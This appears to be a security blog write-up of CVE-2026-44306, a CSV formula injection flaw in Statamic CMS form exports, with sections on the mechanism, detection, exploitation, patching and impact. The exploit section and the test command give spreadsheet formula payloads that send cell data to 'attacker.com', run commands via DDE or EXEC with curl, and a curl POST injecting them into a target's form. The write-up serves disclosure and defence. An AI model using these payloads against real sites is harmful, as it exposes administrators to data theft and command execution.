Listen to this Post
How CVE-2026-44306 Works
Statamic CMS is a Laravel and Git powered content management system. Prior to versions 5.73.24 and 6.20.1, the application failed to properly neutralize formula elements in CSV exports of form submissions. The vulnerability stems from the way spreadsheet applications interpret certain leading characters—specifically =, +, -, and @—as the start of a formula or macro.
An unauthenticated front-end visitor can submit a form containing a value that begins with one of these trigger characters. For example, a malicious user could enter `=HYPERLINK(“http://attacker.com/steal?data=”&A1,”Click me”)` or `=CMD|’/C calc’!A0` into a text field. This value is stored in the Statamic database as part of the form submission record.
When a Control Panel user later exports these submissions to CSV and opens the file in a spreadsheet application like Microsoft Excel, LibreOffice Calc, or Google Sheets, the application interprets the injected string as a live formula rather than as plain text. The formula then executes within the context of the spreadsheet software, potentially performing actions such as:
– Exfiltrating other data from the spreadsheet to an attacker-controlled server.
– Executing system commands (especially in older Excel versions with DDE or OLE exploits).
– Running malicious macros if the spreadsheet is saved in a format that supports them.
The exploitation occurs entirely on the end-user’s machine—the Statamic server itself is not compromised. However, the Control Panel user opening the export is the one whose environment is at risk. Because form submissions can come from anonymous visitors, an attacker can inject the payload without any authentication or prior access to the CMS.
The vulnerability is classified as a CSV injection (also known as formula injection or spreadsheet injection). It is documented under CWE-1236: Improper Neutralization of Formula Elements in a CSV File. The issue was addressed in versions 5.73.24 and 6.20.1 by escaping formula trigger characters during CSV export generation.
DailyCVE Form
- Platform: Statamic CMS
- Version: < 5.73.24, < 6.20.1
- Vulnerability: CSV Formula Injection
- Severity: Moderate
- Date: 2026-06-03
- Prediction: 2026-06-26 (already patched)
What Undercode Say: Analytics
The vulnerability allows unauthenticated attackers to inject formulas via form fields. The following bash command can be used to test for the presence of the vulnerability by simulating a malicious form submission:
curl -X POST https://target.com/!/forms/contact \ -d "name=test" \ -d "[email protected]" \ -d "message==HYPERLINK(\"http://attacker.com/steal?data=\"&A1,\"Click me\")"
To check if your Statamic installation is vulnerable, inspect the CSV export generation logic. Look for the absence of escaping in the `statamic/cms` package. The following Composer command will show the currently installed version:
composer show statamic/cms | grep versions
If the version is below 5.73.24 (for v5) or 6.20.1 (for v6), the installation is vulnerable.
Exploit
An attacker can exploit this vulnerability by submitting a form with a payload in any field that will be included in the CSV export. For example:
– Payload: `=HYPERLINK(“http://attacker.com/log?data=”&A1,”View Details”)`
– Result: When an admin opens the CSV, the spreadsheet will attempt to fetch the URL, potentially leaking the contents of cell A1 (which may contain other sensitive submission data) to the attacker’s server.
More dangerous payloads can leverage older Excel features:
- Payload: `=CMD|’/C calc’!A0` (executes calculator on Windows)
- Payload: `=EXEC(“curl http://attacker.com/exfil?data=”&A1)` (if Excel macros are enabled)
Protection
- Upgrade Statamic to version 5.73.24 or 6.20.1 or later. These versions escape formula trigger characters (
=,+,-,@) by prefixing them with a single quote (') or tab character, preventing spreadsheet applications from interpreting them as formulas. - If upgrading is not immediately possible, implement a temporary workaround by sanitizing form submissions before they are stored. Add a middleware or event listener that scans all incoming form data and escapes or rejects values starting with formula trigger characters.
- Educate Control Panel users to avoid opening CSV exports directly in spreadsheet applications. Instead, they should import the CSV using the “Text Import” wizard and explicitly mark all columns as “Text” to prevent formula evaluation.
- Use the `League\Csv\EscapeFormula` formatter if you are generating CSV files programmatically. This library automatically escapes formula characters in accordance with OWASP recommendations.
Impact
- Confidentiality: An attacker could exfiltrate other submission data or even the entire spreadsheet content via external hyperlink requests.
- Integrity: Malicious formulas could modify the spreadsheet or, in extreme cases, the local file system if the spreadsheet application has sufficient permissions.
- Availability: No direct impact on the Statamic server; the risk is confined to the Control Panel user’s workstation.
- Scope: The vulnerability affects all Statamic installations that allow unauthenticated form submissions and have Control Panel users who export submissions to CSV. The risk is heightened in environments where administrators use older, less secure spreadsheet software or have macros enabled by default.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
